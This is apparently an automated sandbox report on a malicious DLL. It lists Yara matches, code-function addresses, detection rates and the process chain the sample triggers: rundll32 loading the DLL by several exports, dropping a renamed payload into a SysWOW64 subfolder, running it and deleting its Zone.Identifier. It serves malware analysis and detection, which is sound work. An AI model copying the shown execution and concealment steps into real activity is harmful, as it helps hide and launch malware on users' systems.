Source: Yara match, file source: 5.2.rundll32.exe.c42240.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 8.2.rundll32.exe.2db0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.2e60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.31734a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.31734a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 8.2.rundll32.exe.2db0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.911209239.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.907559664.000000000315A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.1014042657.000000000303A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.927676600.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.907514993.0000000000C2A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.910127434.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.908758600.000000000093A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.926918217.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.962136592.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: nhlHEF5IVY.dll  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: C:\Windows\System32\svchost.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
Source: C:\Windows\SysWOW64\rundll32.exe  File deleted: C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb:Zone.Identifier
Source: C:\Windows\SysWOW64\rundll32.exe  File created: C:\Windows\SysWOW64\Kaxguqlsqyxr\
Source: C:\Windows\System32\loaddll32.exe  Code functions:
    0_2_00971291, 0_2_00960E97, 0_2_00960A93, 0_2_0096CE90, 0_2_0095FE9D, 0_2_0096009A, 0_2_0096A29B, 0_2_0096E899,
    0_2_0095A083, 0_2_0095F48A, 0_2_009590D4, 0_2_009628D5, 0_2_009652D1, 0_2_00971CDB, 0_2_009592C1, 0_2_00952CC2,
    0_2_009720CE, 0_2_009610CD, 0_2_009662F5, 0_2_00964CF5, 0_2_009584F0, 0_2_009640FE, 0_2_00951EFB, 0_2_009546FA,
    0_2_0095C0EA, 0_2_009656E9, 0_2_0097261E, 0_2_0096C205, 0_2_0095800A, 0_2_00953432, 0_2_0095243F, 0_2_00959824,
    0_2_0096282D, 0_2_00953228, 0_2_0096EA55, 0_2_00956453, 0_2_0095CE5A, 0_2_00967445, 0_2_00963043, 0_2_0095AE43,
    0_2_0095544C, 0_2_0095AA4E, 0_2_0096B677, 0_2_0095387F, 0_2_0095FA78, 0_2_0095B464, 0_2_0095EE60, 0_2_00953A6C,
    0_2_00956869, 0_2_00957795, 0_2_0095B191, 0_2_00961591, 0_2_0096DB87, 0_2_00954B81, 0_2_00963782, 0_2_00958D80,
    0_2_0095358B, 0_2_0096E3B5, 0_2_0096D7BE, 0_2_009559BF, 0_2_009543BE, 0_2_009685B8, 0_2_0096E5A7, 0_2_00960BA4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096DDA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009689A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009575D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009519C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095A3E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009551EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096EDED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095CB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00954D1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096590E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00963D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096BF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096970A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096E10A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096CD35
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095F73B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00969124
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095A92F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00966540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00970370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095BD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095CF6E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A9F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A77B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AD530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A1DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A3A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B0380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BE3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A6070
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B10C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AA890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A9F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A77B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AD530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A1DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A3A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B0380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4BE3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B10C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AA890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D01291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D01CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D020CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CECE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D0261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D00370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CECF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CECB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC9124
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4BAC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4BAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: nhlHEF5IVY.dllVirustotal: Detection: 21%
                      Source: nhlHEF5IVY.dllReversingLabs: Detection: 17%
                      Source: nhlHEF5IVY.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
